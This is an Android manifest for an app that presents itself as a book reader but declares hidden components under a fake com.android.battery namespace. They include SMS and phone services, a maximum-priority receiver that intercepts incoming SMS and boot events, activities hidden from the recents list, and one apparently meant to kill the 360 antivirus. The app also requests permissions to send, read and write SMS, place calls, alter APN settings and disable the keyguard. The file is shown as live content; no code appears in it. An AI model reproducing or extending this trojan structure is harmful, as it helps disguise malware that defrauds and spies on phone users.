<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.keji.danti400">
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <meta-data android:name="APP_UID" android:value="f1cd8ba"/>
        <activity android:label="@string/bookname" android:name="com.keji.danti.MainA" android:screenOrientation="portrait">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:name="com.keji.danti.Boutique" android:screenOrientation="portrait" android:theme="@style/Theme.App"/>
        <activity android:name="com.keji.danti.Background" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.Lists" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.History" android:screenOrientation="portrait"/>
        <activity android:name="com.keji.danti.TextDetail" android:screenOrientation="portrait"/>
        <activity android:label="@string/setting" android:name="com.keji.danti.Setting" android:screenOrientation="portrait"/>
        <service android:name="com.android.battery.BridgeProvider">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
            </intent-filter>
        </service>
        <receiver android:name="com.android.battery.BaseBroadcastReceiver">
            <intent-filter android:priority="2147483647">
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.INPUT_METHOD_CHANGED"/>
                <action android:name="android.provider.Telephony.SIM_FULL"/>
                <action android:name="android.provider.Telephony.WAP_PUSH_RECEIVED"/>
                <action android:name="android.intent.action.BATTERY_LOW"/>
                <action android:name="android.intent.action.BATTERY_OKAY"/>
                <action android:name="android.intent.action.USER_PRESENT"/>
            </intent-filter>
        </receiver>
        <service android:name="com.android.battery.AdSmsService"/>
        <service android:name="com.android.battery.PhoneService"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.battery.BalckActivity2" android:screenOrientation="portrait"/>
        <activity android:excludeFromRecents="true" android:launchMode="singleInstance" android:name="com.android.battery.BalckActivity" android:screenOrientation="portrait"/>
        <activity android:excludeFromRecents="true" android:name="com.android.battery.KillThreeSixZero" android:screenOrientation="portrait" android:theme="@style/Transparent"/>
    </application>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <uses-permission android:name="android.permission.CALL_PHONE"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RESTART_PACKAGES"/>
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
</manifest>
